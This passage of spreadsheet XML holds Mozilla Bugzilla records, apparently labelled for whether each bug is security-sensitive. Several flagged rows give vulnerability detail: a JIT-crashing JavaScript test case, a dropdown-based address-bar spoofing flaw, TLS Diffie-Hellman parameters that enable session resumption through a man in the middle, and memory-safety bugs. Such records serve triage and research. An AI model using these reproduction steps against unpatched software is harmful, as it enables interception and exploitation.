      <c r="K1345" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1345" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1345" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1345" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1345" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1345" t="inlineStr"/>
      <c r="Q1345" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1345" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1345" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1345" t="n">
        <v>1</v>
      </c>
      <c r="U1345" t="n">
        <v>0</v>
      </c>
      <c r="V1345" t="n">
        <v>8</v>
      </c>
      <c r="W1345" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1443169 +++
There's a processor rule called AuroraVersionFixitRule in socorro/processor/mozilla_transform_rules.py that has a hard-coded lookup table of build id -&gt; correct version number. Since it's hard-coded, we need to update it every time a new Aurora version is released.
Builds get built on the first merge day, so they should be in BuildHub now. However, BuildHub only has a 61.0b1rc1:
https://mozilla-services.github.io/buildhub/?q=61.0b1
This bug covers figuring out what the build id is and adding it to the processor rule.</t>
        </is>
      </c>
      <c r="X1345" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1346">
      <c r="A1346" t="n">
        <v>1630764</v>
      </c>
      <c r="B1346" t="inlineStr">
        <is>
          <t>2020-04-16 14:17:35 -0700</t>
        </is>
      </c>
      <c r="C1346" t="inlineStr">
        <is>
          <t>Please add the Russian version of the Yandex logo into the TippyTop images on Central.</t>
        </is>
      </c>
      <c r="D1346" t="inlineStr">
        <is>
          <t>2020-06-04 16:37:10 -0700</t>
        </is>
      </c>
      <c r="E1346" t="n">
        <v>1</v>
      </c>
      <c r="F1346" t="n">
        <v>1</v>
      </c>
      <c r="G1346" t="n">
        <v>2</v>
      </c>
      <c r="H1346" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1346" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1346" t="inlineStr">
        <is>
          <t>Messaging System</t>
        </is>
      </c>
      <c r="K1346" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1346" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1346" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1346" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1346" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1346" t="inlineStr"/>
      <c r="Q1346" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1346" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1346" t="inlineStr">
        <is>
          <t>Firefox 77</t>
        </is>
      </c>
      <c r="T1346" t="n">
        <v>1</v>
      </c>
      <c r="U1346" t="n">
        <v>0</v>
      </c>
      <c r="V1346" t="n">
        <v>11</v>
      </c>
      <c r="W1346" t="inlineStr">
        <is>
          <t>For Mozilla Options – General – Language – Russian. -         Could you please, switch the logo into a Russian version in accordance with our guidelines. It might be just letter “Я”, yet in Russian. (here is .svgfile:///C:/Users/tanchis/Downloads/yandex-logo-ru-RGB.svg). Please let me know, if you need more from designers.-         Can we link this logo to yandex.ru instead of linking to searchbox?</t>
        </is>
      </c>
      <c r="X1346" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1347">
      <c r="A1347" t="n">
        <v>1096138</v>
      </c>
      <c r="B1347" t="inlineStr">
        <is>
          <t>2014-11-09 19:23:41 -0800</t>
        </is>
      </c>
      <c r="C1347" t="inlineStr">
        <is>
          <t>Assertion failure: *to != *moves_[i].to(), at jit/LIR.cpp</t>
        </is>
      </c>
      <c r="D1347" t="inlineStr">
        <is>
          <t>2016-06-04 16:13:20 -0700</t>
        </is>
      </c>
      <c r="E1347" t="n">
        <v>1</v>
      </c>
      <c r="F1347" t="n">
        <v>1</v>
      </c>
      <c r="G1347" t="n">
        <v>3</v>
      </c>
      <c r="H1347" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1347" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1347" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K1347" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1347" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1347" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1347" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1347" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1347" t="inlineStr">
        <is>
          <t>[jsbugmon:update][adv-main36+][adv-esr31.5+][b2g-adv-main2.2+]</t>
        </is>
      </c>
      <c r="Q1347" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1347" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1347" t="inlineStr">
        <is>
          <t>mozilla37</t>
        </is>
      </c>
      <c r="T1347" t="n">
        <v>1</v>
      </c>
      <c r="U1347" t="n">
        <v>0</v>
      </c>
      <c r="V1347" t="n">
        <v>25</v>
      </c>
      <c r="W1347" t="inlineStr">
        <is>
          <t>(function(x, y) {
    var r2 = r1
    var r3 = y ^ 4
    var r4 = (function(){})()
    var r6 = r5
    x = 5 % r3
    r4 - r2
    r3 - 6
    return x
})()
asserts js debug shell on m-c changeset eb0d3b3c0b22 with --ion-eager --no-threads at Assertion failure: *to != *moves_[i].to(), at jit/LIR.cpp.
Debug configure options:
LD=ld CROSS_COMPILE=1 CC="clang -Qunused-arguments -msse2 -mfpmath=sse -arch i386" RANLIB=ranlib CXX="clang++ -Qunused-arguments -msse2 -mfpmath=sse -arch i386" AS=$CC AR=ar STRIP="strip -x -S" HOST_CC="clang -Qunused-arguments -msse2 -mfpmath=sse" AUTOCONF=/usr/local/Cellar/autoconf213/2.13/bin/autoconf213 HOST_CXX="clang++ -Qunused-arguments -msse2 -mfpmath=sse" sh /Users/skywalker/trees/mozilla-central/js/src/configure --target=i386-apple-darwin9.2.0 --enable-macos-target=10.5 --enable-debug --enable-optimize --enable-nspr-build --enable-more-deterministic --with-ccache --enable-gczeal --enable-debug-symbols --disable-tests
autoBisect shows this is probably related to the following changeset:
The first bad revision is:
changeset:   https://hg.mozilla.org/mozilla-central/rev/7e2e5dffbb2e
user:        Kannan Vijayan
date:        Sun Aug 17 15:58:16 2014 -0400
summary:     Bug 1054340 - Remove PcOffset IR instructions. r=h4writer
This seems 32-bit only. Setting s-s and assuming sec-critical because LIR is involved.
Kannan, is bug 1054340 a possible regressor?</t>
        </is>
      </c>
      <c r="X1347" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1348">
      <c r="A1348" t="n">
        <v>864598</v>
      </c>
      <c r="B1348" t="inlineStr">
        <is>
          <t>2013-04-22 18:16:29 -0700</t>
        </is>
      </c>
      <c r="C1348" t="inlineStr">
        <is>
          <t>Camera app crashes system when switching to camcorder</t>
        </is>
      </c>
      <c r="D1348" t="inlineStr">
        <is>
          <t>2013-09-09 23:45:24 -0700</t>
        </is>
      </c>
      <c r="E1348" t="n">
        <v>1</v>
      </c>
      <c r="F1348" t="n">
        <v>1</v>
      </c>
      <c r="G1348" t="n">
        <v>6</v>
      </c>
      <c r="H1348" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1348" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J1348" t="inlineStr">
        <is>
          <t>Gaia::Camera</t>
        </is>
      </c>
      <c r="K1348" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1348" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M1348" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N1348" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1348" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1348" t="inlineStr">
        <is>
          <t>[b2g-crash]</t>
        </is>
      </c>
      <c r="Q1348" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1348" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1348" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1348" t="n">
        <v>1</v>
      </c>
      <c r="U1348" t="n">
        <v>0</v>
      </c>
      <c r="V1348" t="n">
        <v>20</v>
      </c>
      <c r="W1348" t="inlineStr">
        <is>
          <t>Created attachment 740583
Camera to camcorder crash stack
Likely caused by the recent layers refactoring</t>
        </is>
      </c>
      <c r="X1348" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1349">
      <c r="A1349" t="n">
        <v>1185679</v>
      </c>
      <c r="B1349" t="inlineStr">
        <is>
          <t>2015-07-20 13:24:47 -0700</t>
        </is>
      </c>
      <c r="C1349" t="inlineStr">
        <is>
          <t>[tracker] use Atlas for Socorro Terraform</t>
        </is>
      </c>
      <c r="D1349" t="inlineStr">
        <is>
          <t>2016-08-29 05:33:20 -0700</t>
        </is>
      </c>
      <c r="E1349" t="n">
        <v>1</v>
      </c>
      <c r="F1349" t="n">
        <v>1</v>
      </c>
      <c r="G1349" t="n">
        <v>4</v>
      </c>
      <c r="H1349" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1349" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J1349" t="inlineStr">
        <is>
          <t>Infra</t>
        </is>
      </c>
      <c r="K1349" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1349" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1349" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1349" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1349" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1349" t="inlineStr"/>
      <c r="Q1349" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1349" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1349" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1349" t="n">
        <v>1</v>
      </c>
      <c r="U1349" t="n">
        <v>0</v>
      </c>
      <c r="V1349" t="n">
        <v>2</v>
      </c>
      <c r="W1349" t="inlineStr">
        <is>
          <t>We need to make a few changes to the way we use Terraform to fit into Atlas better.</t>
        </is>
      </c>
      <c r="X1349" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1350">
      <c r="A1350" t="n">
        <v>1273129</v>
      </c>
      <c r="B1350" t="inlineStr">
        <is>
          <t>2016-05-16 06:23:23 -0700</t>
        </is>
      </c>
      <c r="C1350" t="inlineStr">
        <is>
          <t>Firefox Navigation from a page with an active &lt;select&gt; dropdown menu can be used for URL/SSL spoofing and ClickJacking</t>
        </is>
      </c>
      <c r="D1350" t="inlineStr">
        <is>
          <t>2024-06-02 18:30:36 -0700</t>
        </is>
      </c>
      <c r="E1350" t="n">
        <v>1</v>
      </c>
      <c r="F1350" t="n">
        <v>1</v>
      </c>
      <c r="G1350" t="n">
        <v>3</v>
      </c>
      <c r="H1350" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1350" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1350" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1350" t="inlineStr">
        <is>
          <t>41 Branch</t>
        </is>
      </c>
      <c r="L1350" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1350" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1350" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1350" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1350" t="inlineStr">
        <is>
          <t>[adv-main47+][adv-esr45.2+]</t>
        </is>
      </c>
      <c r="Q1350" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1350" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1350" t="inlineStr">
        <is>
          <t>mozilla49</t>
        </is>
      </c>
      <c r="T1350" t="n">
        <v>1</v>
      </c>
      <c r="U1350" t="n">
        <v>0</v>
      </c>
      <c r="V1350" t="n">
        <v>31</v>
      </c>
      <c r="W1350" t="inlineStr">
        <is>
          <t>Created attachment 8752819
TESTCASE V1 and TESTCASE V2.zip
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0) Gecko/20100101 Firefox/46.0
Build ID: 20160502172042
Steps to reproduce:
This new vulnerability is very similar to a vulnérability previously reported by me: MFSA-2013-94 ( https://bugzilla.mozilla.org/show_bug.cgi?id=868327 ).
I discovered again a malicious method to put arbitrary HTML content within &lt;select&gt; elements and place it in arbitrary locations. 
This can be used to spoof the displayed addressbar (Location Bar URL &amp; SSL Spooofing), leading also to multiple clickjacking attacks (eg: WebCam ClickJacking using the WebRTC dialog) and other spoofing attacks.
I have two Proof of Concept, the first use a &lt;select&gt; dropdown menu no persistent, and the 2nd Proof of Concept use a &lt;select&gt; dropdown menu persistent.
(Two demonstration videos will be uploaded to show you the severity and the impact of these PoCs and of this vulnerability).
Actual results:
This can be used to spoof the displayed addressbar (or others spoofing attacks) and leading also to multiple clickjacking attacks.
Expected results:
In a normal case, a &lt;select&gt; element shouldn't cover the location bar and this &lt;select&gt; menu shouldn't persist during browsing.</t>
        </is>
      </c>
      <c r="X1350" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1351">
      <c r="A1351" t="n">
        <v>778908</v>
      </c>
      <c r="B1351" t="inlineStr">
        <is>
          <t>2012-07-30 13:40:28 -0700</t>
        </is>
      </c>
      <c r="C1351" t="inlineStr">
        <is>
          <t>tinderbox.m.o is not generating output</t>
        </is>
      </c>
      <c r="D1351" t="inlineStr">
        <is>
          <t>2015-03-12 08:17:16 -0700</t>
        </is>
      </c>
      <c r="E1351" t="n">
        <v>1</v>
      </c>
      <c r="F1351" t="n">
        <v>1</v>
      </c>
      <c r="G1351" t="n">
        <v>6</v>
      </c>
      <c r="H1351" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1351" t="inlineStr">
        <is>
          <t>mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J1351" t="inlineStr">
        <is>
          <t>Server Operations</t>
        </is>
      </c>
      <c r="K1351" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1351" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1351" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1351" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1351" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1351" t="inlineStr"/>
      <c r="Q1351" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1351" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S1351" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1351" t="n">
        <v>1</v>
      </c>
      <c r="U1351" t="n">
        <v>0</v>
      </c>
      <c r="V1351" t="n">
        <v>11</v>
      </c>
      <c r="W1351" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #728510 +++
(Apologies for anyone extraneous on the CC list; I don't know all the parties using/managing tinderbox and figured the last "tinderbox is failing" bug would have most of the requisite people.)
Sometime in the past 12-24 hours, tinderbox stopped displaying output for Camino, Bugzilla, NSS, SeaMonkey, etc.
Right now all that's displayed is the "dead tree" info: tree status, and the column headers for Build Time and Guilty; no builders, and no builds.
For "Previous 12 Hours" the header cells for the builders also appear, but no builds.  Going back 12 more hours (or "Previous 24 hours" from the main page), things look normal.
I can confirm on my end that mail is getting sent to tinderbox, so it seems like it's a problem on the tinderbox end.
This obviously makes it difficult for projects that rely on tinderbox to continue making checkins.</t>
        </is>
      </c>
      <c r="X1351" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1352">
      <c r="A1352" t="n">
        <v>679593</v>
      </c>
      <c r="B1352" t="inlineStr">
        <is>
          <t>2011-08-16 20:43:55 -0700</t>
        </is>
      </c>
      <c r="C1352" t="inlineStr">
        <is>
          <t>Possible JSScript double-free</t>
        </is>
      </c>
      <c r="D1352" t="inlineStr">
        <is>
          <t>2012-01-19 11:27:15 -0800</t>
        </is>
      </c>
      <c r="E1352" t="n">
        <v>1</v>
      </c>
      <c r="F1352" t="n">
        <v>1</v>
      </c>
      <c r="G1352" t="n">
        <v>3</v>
      </c>
      <c r="H1352" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1352" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1352" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1352" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1352" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1352" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1352" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1352" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1352" t="inlineStr">
        <is>
          <t>[sg:critical?], wanted-standalone-js [qa-]</t>
        </is>
      </c>
      <c r="Q1352" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1352" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1352" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1352" t="n">
        <v>1</v>
      </c>
      <c r="U1352" t="n">
        <v>0</v>
      </c>
      <c r="V1352" t="n">
        <v>10</v>
      </c>
      <c r="W1352" t="inlineStr">
        <is>
          <t>The problem is in js_CloneFunctionObject. Consider the cross-compartment case where we're clonging |fun|. We create a new function |cfun| and do:
  cfun-&gt;u = fun-&gt;getFunctionPrivate()-&gt;u;
For an interpreted script, this makes cfun-&gt;script() == fun-&gt;script(). Then we do
  JSScript *cscript = js_CloneScript(cx, script);
and, after a null check on cscript, make |cfun-&gt;script() == cscript|.
Say that we fail to allocate cscript. Then we'll have two allocated function objects, in different compartments, pointing to the same script. This is bad because of the compartment thing and also because each function object finalizer will free the script, so it will be freed twice.</t>
        </is>
      </c>
      <c r="X1352" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1353">
      <c r="A1353" t="n">
        <v>124937</v>
      </c>
      <c r="B1353" t="inlineStr">
        <is>
          <t>2002-02-11 16:22:00 -0800</t>
        </is>
      </c>
      <c r="C1353" t="inlineStr">
        <is>
          <t>Templatise show_activity.cgi</t>
        </is>
      </c>
      <c r="D1353" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:28 -0800</t>
        </is>
      </c>
      <c r="E1353" t="n">
        <v>1</v>
      </c>
      <c r="F1353" t="n">
        <v>1</v>
      </c>
      <c r="G1353" t="n">
        <v>4</v>
      </c>
      <c r="H1353" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1353" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1353" t="inlineStr">
        <is>
          <t>User Interface</t>
        </is>
      </c>
      <c r="K1353" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L1353" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1353" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1353" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1353" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1353" t="inlineStr"/>
      <c r="Q1353" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1353" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S1353" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T1353" t="n">
        <v>1</v>
      </c>
      <c r="U1353" t="n">
        <v>0</v>
      </c>
      <c r="V1353" t="n">
        <v>20</v>
      </c>
      <c r="W1353" t="inlineStr">
        <is>
          <t>Here's another one - this is reasonably simple. We're knocking them off... 
Gerv</t>
        </is>
      </c>
      <c r="X1353" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1354">
      <c r="A1354" t="n">
        <v>934545</v>
      </c>
      <c r="B1354" t="inlineStr">
        <is>
          <t>2013-11-04 10:06:14 -0800</t>
        </is>
      </c>
      <c r="C1354" t="inlineStr">
        <is>
          <t>Do not allow p-1 as a public DH value</t>
        </is>
      </c>
      <c r="D1354" t="inlineStr">
        <is>
          <t>2015-08-30 11:53:40 -0700</t>
        </is>
      </c>
      <c r="E1354" t="n">
        <v>1</v>
      </c>
      <c r="F1354" t="n">
        <v>1</v>
      </c>
      <c r="G1354" t="n">
        <v>3</v>
      </c>
      <c r="H1354" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1354" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J1354" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K1354" t="inlineStr">
        <is>
          <t>trunk</t>
        </is>
      </c>
      <c r="L1354" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1354" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1354" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1354" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1354" t="inlineStr">
        <is>
          <t>[keep bug hidden pending publication of research report][qa-][adv-main27+][adv-esr24.3+]</t>
        </is>
      </c>
      <c r="Q1354" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1354" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1354" t="inlineStr">
        <is>
          <t>3.15.4</t>
        </is>
      </c>
      <c r="T1354" t="n">
        <v>1</v>
      </c>
      <c r="U1354" t="n">
        <v>0</v>
      </c>
      <c r="V1354" t="n">
        <v>40</v>
      </c>
      <c r="W1354" t="inlineStr">
        <is>
          <t>Created attachment 826845
Creating two TLS sessions with the same keys on different servers
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0 (Beta/Release)
Build ID: 20131025151332
Steps to reproduce:
1. Create a TLS server supporting only the DHE key exchange.
2. During any handshake, send the parameters &lt;p, g, g^q&gt; where p=2q+1 is a prime such that q is also prime and g is not a quadratic residue mod p
3. NSS accepts this value and proceeds with the handshake. The PMS computed by NSS is g^(q*Kc)
Actual results:
NSS accepts to proceed with the exchange. If g is not a quadratic residue mod p, then g^q = p-1 which is not rejected by NSS as it accepts any public value in [2, p-1] (this is allowed by rfc2631). Then, the computed PMS g^(q*Kc) is 1 if Kc is even (because g^(2q)=g^(p-1)=1 [mod p]) and p-1 if Kc is odd (because g^q=p-1 [mod p]). If the server chose a Ks with the same parity, the PMS will be the same on the client and server but the communication is not safe because an attacker can derive it from the parameters sent over the network.
Expected results:
In itself, the impact of accepting &lt;2p+1,g,g^p&gt; is not too high, because these parameters are signed by the server certificate's public key and very few server will chose them.
However, our worry is the ability for a malicious website to send such parameters both to the client and to a victim server acting as man in the middle. This can allow a TLS session to the malicious server to be resumed on the victim server, which breaks Channel Bindings / Channel ID and can be combined with renegotiation in Chromium to break client authentication, among other things. This is discussed in Chrome bugs [305951, 306959, 305220] and is the main reason why this report should stay private for a short while.</t>
        </is>
      </c>
      <c r="X1354" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1355">
      <c r="A1355" t="n">
        <v>1024765</v>
      </c>
      <c r="B1355" t="inlineStr">
        <is>
          <t>2014-06-12 16:07:32 -0700</t>
        </is>
      </c>
      <c r="C1355" t="inlineStr">
        <is>
          <t>Refcounting of nsTimerImpl looks wrong in in TimerThread when PostTimerEvent fails</t>
        </is>
      </c>
      <c r="D1355" t="inlineStr">
        <is>
          <t>2016-01-11 14:33:52 -0800</t>
        </is>
      </c>
      <c r="E1355" t="n">
        <v>1</v>
      </c>
      <c r="F1355" t="n">
        <v>1</v>
      </c>
      <c r="G1355" t="n">
        <v>3</v>
      </c>
      <c r="H1355" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1355" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1355" t="inlineStr">
        <is>
          <t>XPCOM</t>
        </is>
      </c>
      <c r="K1355" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1355" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1355" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1355" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1355" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1355" t="inlineStr">
        <is>
          <t>[adv-main31+][adv-esr24.7+][qa-]</t>
        </is>
      </c>
      <c r="Q1355" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1355" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1355" t="inlineStr">
        <is>
          <t>mozilla33</t>
        </is>
      </c>
      <c r="T1355" t="n">
        <v>1</v>
      </c>
      <c r="U1355" t="n">
        <v>0</v>
      </c>
      <c r="V1355" t="n">
        <v>58</v>
      </c>
      <c r="W1355" t="inlineStr">
        <is>
          <t>Noticed this while working on bug 941751. In TimerThread, we call nsTimerImpl::PostTimerEvent (just after doing an addref/release while removing the timer from mTimers), which does the following:
http://dxr.mozilla.org/mozilla-central/source/xpcom/threads/nsTimerImpl.cpp#722
The constructor of nsTimerEvent does not addref (because we are essentially transferring a reference from mTimers to the nsTimerEvent):
http://dxr.mozilla.org/mozilla-central/source/xpcom/threads/nsTimerImpl.cpp#116
It does set itself up to perform a release once it is destroyed, which makes sense:
http://dxr.mozilla.org/mozilla-central/source/xpcom/threads/nsTimerImpl.cpp#157
If we fail for any reason (other than OOM), the nsTimerEvent is destroyed prior to the return, and the refcount is decremented. Then, we decrement the refcount _again_ here, leading to a very misleading logging statement for yours truly, and probably a dangling nsITimer pointer somewhere:
http://dxr.mozilla.org/mozilla-central/source/xpcom/threads/TimerThread.cpp#266</t>
        </is>
      </c>
      <c r="X1355" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1356">
      <c r="A1356" t="n">
        <v>847927</v>
      </c>
      <c r="B1356" t="inlineStr">
        <is>
          <t>2013-03-05 06:56:39 -0800</t>
        </is>
      </c>
      <c r="C1356" t="inlineStr">
        <is>
          <t>Gaia UI tests fail because they can't figure out the symbols_url</t>
        </is>
      </c>
      <c r="D1356" t="inlineStr">
        <is>
          <t>2018-05-08 15:19:48 -0700</t>
        </is>
      </c>
      <c r="E1356" t="n">
        <v>1</v>
      </c>
      <c r="F1356" t="n">
        <v>1</v>
      </c>
      <c r="G1356" t="n">
        <v>5</v>
      </c>
      <c r="H1356" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1356" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1356" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1356" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1356" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1356" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1356" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1356" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1356" t="inlineStr"/>
      <c r="Q1356" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1356" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1356" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1356" t="n">
        <v>1</v>
      </c>
      <c r="U1356" t="n">
        <v>0</v>
      </c>
      <c r="V1356" t="n">
        <v>10</v>
      </c>
      <c r="W1356" t="inlineStr">
        <is>
          <t>This is a fall out from bug 843303.
04:41:21 FATAL - Can't figure out symbols_url from installer_url http://pvtbuilds.pvt.build.mozilla.org//pub/mozilla.org/b2g/tinderbox-builds/gaia-master-panda/20130305033150!</t>
        </is>
      </c>
      <c r="X1356" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1357">
      <c r="A1357" t="n">
